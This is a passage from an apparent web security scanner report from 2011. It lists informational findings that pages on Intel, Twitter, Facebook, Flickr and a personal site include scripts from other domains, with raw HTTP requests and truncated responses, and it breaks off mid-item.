  • http://www.gstatic.com/sites/p/2fa342/system/js/jot_min_view__en.js

Request

GET /dev-tools-for-upnp<BR/ HTTP/1.1
Host: opentools.homeip.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=utf-8
Date: Sat, 05 Feb 2011 23:17:11 GMT
Expires: Sat, 05 Feb 2011 23:17:11 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
</script>
<script xmlns="http://www.w3.org/1999/xhtml" src="http://www.gstatic.com/sites/p/2fa342/system/js/jot_min_view__en.js"></script>
...[SNIP]...

18.90. http://scoop.intel.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scoop.intel.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:
  • http://platform.twitter.com/widgets.js?ver=1.1

Request

GET / HTTP/1.1
Host: scoop.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:41 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
X-Pingback: http://scoop.intel.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 48823

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="e
...[SNIP]...
<link rel='stylesheet' id='contact-form-7-css' href='http://scoop.intel.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.2' type='text/css' media='all' />
<script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=1.1'></script>
...[SNIP]...

18.91. http://scoop.intel.com/gapingvoid-art-gallery/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scoop.intel.com
Path:   /gapingvoid-art-gallery/

Issue detail

The response dynamically includes the following script from another domain:
  • http://platform.twitter.com/widgets.js?ver=1.1

Request

GET /gapingvoid-art-gallery/ HTTP/1.1
Host: scoop.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.3
X-Pingback: http://scoop.intel.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39944

   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xml:lang="e
...[SNIP]...
<link rel='stylesheet' id='contact-form-7-css' href='http://scoop.intel.com/wp-content/plugins/contact-form-7/styles.css?ver=2.4.2' type='text/css' media='all' />
<script type='text/javascript' src='http://platform.twitter.com/widgets.js?ver=1.1'></script>
...[SNIP]...

18.92. http://twitter.com/EricMMartin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /EricMMartin

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a1.twimg.com/a/1296843226/javascripts/api.js?1296846619
  • http://a1.twimg.com/a/1296843226/javascripts/lib/gears_init.js?1296846619
  • http://a2.twimg.com/a/1296843226/javascripts/lib/jquery.tipsy.min.js?1296846619
  • http://a2.twimg.com/a/1296843226/javascripts/lib/mustache.js?1296846619
  • http://a3.twimg.com/a/1296843226/javascripts/dismissable.js?1296846619
  • http://a3.twimg.com/a/1296843226/javascripts/geov1.js?1296846619
  • http://a3.twimg.com/a/1296843226/javascripts/twitter.js?1296846619
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /EricMMartin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sun, 06 Feb 2011 01:50:37 GMT
Server: hi
Status: 200 OK
X-Transaction: Sun Feb 06 01:50:37 +0000 2011-92027-14380
ETag: "4f4b360520d46db9d2c40e35326d69cf"
Last-Modified: Sun, 06 Feb 2011 01:50:37 GMT
X-Runtime: 0.00490
Content-Type: text/html; charset=utf-8
Content-Length: 58941
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296957037715544; path=/; expires=Sun, 13-Feb-11 01:50:37 GMT; domain=.twitter.com
Set-Cookie: guest_id=129695703772265016; path=/; expires=Tue, 08 Mar 2011 01:50:37 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJvcqfgtAToHaWQiJTY5Y2RjMDAxZDMxYWUz%250AYmI0ZDRlZDMzMmU5ZjE5ZDEwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--b743a8588e3835a08cf5844d1d8af9bc6cda4b40; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296843226/javascripts/twitter.js?1296846619" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296843226/javascripts/lib/jquery.tipsy.min.js?1296846619" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296843226/javascripts/lib/gears_init.js?1296846619" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296843226/javascripts/lib/mustache.js?1296846619" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296843226/javascripts/geov1.js?1296846619" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296843226/javascripts/api.js?1296846619" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296843226/javascripts/lib/mustache.js?1296846619" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296843226/javascripts/dismissable.js?1296846619" type="text/javascript"></script>
...[SNIP]...

18.93. http://twitter.com/EricMMartin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /EricMMartin

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1296843226/javascripts/api.js?1296853410
  • http://a0.twimg.com/a/1296843226/javascripts/lib/gears_init.js?1296853410
  • http://a0.twimg.com/a/1296843226/javascripts/lib/jquery.tipsy.min.js?1296853410
  • http://a1.twimg.com/a/1296843226/javascripts/lib/mustache.js?1296853410
  • http://a1.twimg.com/a/1296843226/javascripts/twitter.js?1296853410
  • http://a2.twimg.com/a/1296843226/javascripts/dismissable.js?1296853410
  • http://a2.twimg.com/a/1296843226/javascripts/geov1.js?1296853410
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /EricMMartin HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 05 Feb 2011 23:22:34 GMT
Server: hi
Status: 200 OK
X-Transaction: Sat Feb 05 23:22:34 +0000 2011-15854-13086
ETag: "b0c81407bf609b9b1cf953048b1105ab"
Last-Modified: Sat, 05 Feb 2011 23:22:34 GMT
X-Runtime: 0.00598
Content-Type: text/html; charset=utf-8
Content-Length: 58433
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296948154509230; path=/; expires=Sat, 12-Feb-11 23:22:34 GMT; domain=.twitter.com
Set-Cookie: guest_id=129694815451621917; path=/; expires=Mon, 07 Mar 2011 23:22:34 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCJZQIvgtAToHaWQiJTMyMDRkZDM2M2Y2OTVm%250AMjM0ZWVmYjAyMjcyMGRlYWM0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--cda732cdfd73b9251d4ab751bf5e3c3ba07fa792; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296843226/javascripts/twitter.js?1296853410" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296843226/javascripts/lib/jquery.tipsy.min.js?1296853410" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296843226/javascripts/lib/gears_init.js?1296853410" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296843226/javascripts/lib/mustache.js?1296853410" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296843226/javascripts/geov1.js?1296853410" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296843226/javascripts/api.js?1296853410" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296843226/javascripts/lib/mustache.js?1296853410" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296843226/javascripts/dismissable.js?1296853410" type="text/javascript"></script>
...[SNIP]...

18.94. http://twitter.com/intel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /intel

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1296843226/javascripts/api.js?1296853410
  • http://a0.twimg.com/a/1296843226/javascripts/lib/gears_init.js?1296853410
  • http://a0.twimg.com/a/1296843226/javascripts/lib/jquery.tipsy.min.js?1296853410
  • http://a1.twimg.com/a/1296843226/javascripts/lib/mustache.js?1296853410
  • http://a1.twimg.com/a/1296843226/javascripts/twitter.js?1296853410
  • http://a2.twimg.com/a/1296843226/javascripts/dismissable.js?1296853410
  • http://a2.twimg.com/a/1296843226/javascripts/geov1.js?1296853410
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /intel HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 05 Feb 2011 23:22:35 GMT
Server: hi
Status: 200 OK
X-Transaction: Sat Feb 05 23:22:35 +0000 2011-36832-54399
ETag: "3f5b73f849632157648b0cfb3f55a625"
Last-Modified: Sat, 05 Feb 2011 23:22:35 GMT
X-Runtime: 0.00573
Content-Type: text/html; charset=utf-8
Content-Length: 57222
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296948155814524; path=/; expires=Sat, 12-Feb-11 23:22:35 GMT; domain=.twitter.com
Set-Cookie: guest_id=129694815582299188; path=/; expires=Mon, 07 Mar 2011 23:22:35 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCK9VIvgtAToHaWQiJTZlNDMwNDM3NzI0Y2Zk%250AMzE2ZDVlMGRkYTQ2ZGMyNzdjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--a5011ad7a2fc54a431253ef8fa174a4aab1fa4cd; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296843226/javascripts/twitter.js?1296853410" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296843226/javascripts/lib/jquery.tipsy.min.js?1296853410" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296843226/javascripts/lib/gears_init.js?1296853410" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296843226/javascripts/lib/mustache.js?1296853410" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296843226/javascripts/geov1.js?1296853410" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296843226/javascripts/api.js?1296853410" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a1.twimg.com/a/1296843226/javascripts/lib/mustache.js?1296853410" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296843226/javascripts/dismissable.js?1296853410" type="text/javascript"></script>
...[SNIP]...

18.95. http://twitter.com/intelnews  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /intelnews

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://a0.twimg.com/a/1296843226/javascripts/lib/mustache.js?1296854632
  • http://a0.twimg.com/a/1296843226/javascripts/twitter.js?1296854632
  • http://a1.twimg.com/a/1296843226/javascripts/dismissable.js?1296854632
  • http://a1.twimg.com/a/1296843226/javascripts/geov1.js?1296854632
  • http://a3.twimg.com/a/1296843226/javascripts/api.js?1296854632
  • http://a3.twimg.com/a/1296843226/javascripts/lib/gears_init.js?1296854632
  • http://a3.twimg.com/a/1296843226/javascripts/lib/jquery.tipsy.min.js?1296854632
  • http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js
  • http://www.google.com/jsapi

Request

GET /intelnews HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Sat, 05 Feb 2011 23:22:36 GMT
Server: hi
Status: 200 OK
X-Transaction: Sat Feb 05 23:22:36 +0000 2011-99178-30534
ETag: "5ef92426ebdf2d0090dae9af07327303"
Last-Modified: Sat, 05 Feb 2011 23:22:36 GMT
X-Runtime: 0.00428
Content-Type: text/html; charset=utf-8
Content-Length: 50405
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296948156798428; path=/; expires=Sat, 12-Feb-11 23:22:36 GMT; domain=.twitter.com
Set-Cookie: guest_id=129694815680453038; path=/; expires=Mon, 07 Mar 2011 23:22:36 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCIVZIvgtAToHaWQiJWQ5Yzk4ZmY4Yzc2ODMw%250ANDBmOWI3NmU3NTA5N2I5MmU1IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--e3633c355f5d65ff6cfe5bdaa2b0cfdaeeaa156d; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296843226/javascripts/twitter.js?1296854632" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296843226/javascripts/lib/jquery.tipsy.min.js?1296854632" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296843226/javascripts/lib/gears_init.js?1296854632" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296843226/javascripts/lib/mustache.js?1296854632" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296843226/javascripts/geov1.js?1296854632" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296843226/javascripts/api.js?1296854632" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296843226/javascripts/lib/mustache.js?1296854632" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296843226/javascripts/dismissable.js?1296854632" type="text/javascript"></script>
...[SNIP]...

18.96. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /widgets/fan.php?api_key=4310e5850ea0577ea41506efdb019db0&channel_url=http%3A%2F%2Fnewsroom.intel.com%2Fcommunity%2Fintel_newsroom%2F%3Fiid%3Dftr%2Bpress%26fbc_channel%3D1&id=22707976849&name=&width=223&connections=0&stream=true&logobar=&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS; datr=8CJHTYhjyotVYfKpZ5B35lnF

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Sat, 05 Feb 2011 23:12:38 GMT
Content-Length: 8544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yp/r/mFutiZvI9yq.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.97. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /widgets/fan.php?api_key=4310e5850ea0577ea41506efdb019db0&channel_url=http%3A%2F%2Fnewsroom.intel.com%2Fcommunity%2Fintel_newsroom%2F%3Fiid%3Dftr%2Bpress%26fbc_channel%3D1&id=22707976849&name&width=223&connections=0&stream=true&logobar&css HTTP/1.1
Host: www.connect.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 23:21:13 GMT
Content-Length: 9266

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://f.static.ak.fbcdn.net/rsrc.php/yX/r/xDKZ0Z55ipf.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.98. http://www.ericmmartin.com/projects/simplemodal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ericmmartin.com
Path:   /projects/simplemodal/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=1.4.3
  • http://platform.twitter.com/widgets.js
  • http://s7.addthis.com/js/250/addthis_widget.js?pub=emartin24&ver=3.0.2
  • http://stats.wordpress.com/e-201105.js

Request

GET /projects/simplemodal/ HTTP/1.1
Host: www.ericmmartin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 05 Feb 2011 20:00:09 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33772


<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>SimpleModal / Eric Martin / ericmmartin.com</title>

<meta name="author" content="Eric Ma
...[SNIP]...
<link rel='stylesheet' id='emm-v3-css' href='http://www.ericmmartin.com/wordpress/wp-content/themes/emm-v3/style.css?ver=1.0.16' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js?ver=1.4.3'></script>
...[SNIP]...
</div>
           <script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://s7.addthis.com/js/250/addthis_widget.js?pub=emartin24&#038;ver=3.0.2'></script>
...[SNIP]...
<!--stats_footer_test--><script src="http://stats.wordpress.com/e-201105.js" type="text/javascript"></script>
...[SNIP]...

18.99. http://www.facebook.com/Intel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /Intel

Issue detail

The response dynamically includes the following script from another domain:
  • http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /Intel HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=PvG3c; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 23:21:09 GMT
Content-Length: 43972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.100. http://www.facebook.com/sharer.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /sharer.php

Issue detail

The response dynamically includes the following script from another domain:
  • http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js

Request

GET /sharer.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=8CJHTYhjyotVYfKpZ5B35lnF; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dehow.com%26placement%3Dactivity%26extra_1%3Dhttp%253A%252F%252Fwww.ehow.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=nQPs-; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fsharer.php; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sat, 05 Feb 2011 23:21:08 GMT
Content-Length: 10821

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yE/r/vKC7KTGk0BI.css" />

<script type="text/javascript" src="http://c.static.ak.fbcdn.net/rsrc.php/yf/r/mz6o8eG7kn5.js"></script>
...[SNIP]...

18.101. http://www.flickr.com/photos/intelphotos  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /photos/intelphotos

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://l.yimg.com/a/lib/map/js/api/ymapapi_3_8_2_7.js
  • http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.99272.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.17
  • http://l.yimg.com/g/javascript/global.js.v93276.17
  • http://l.yimg.com/g/javascript/photo_cols.js.v38771.17
  • http://l.yimg.com/g/javascript/photo_mini_map.js.v84889.17
  • http://l.yimg.com/g/javascript/s_output_en-us.js.9999999912969570823078
  • http://us.adserver.yahoo.com/a?f=792600013&p=flickr&l=FOOT9&c=r

Request

GET /photos/intelphotos HTTP/1.1
Host: www.flickr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 01:51:22 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
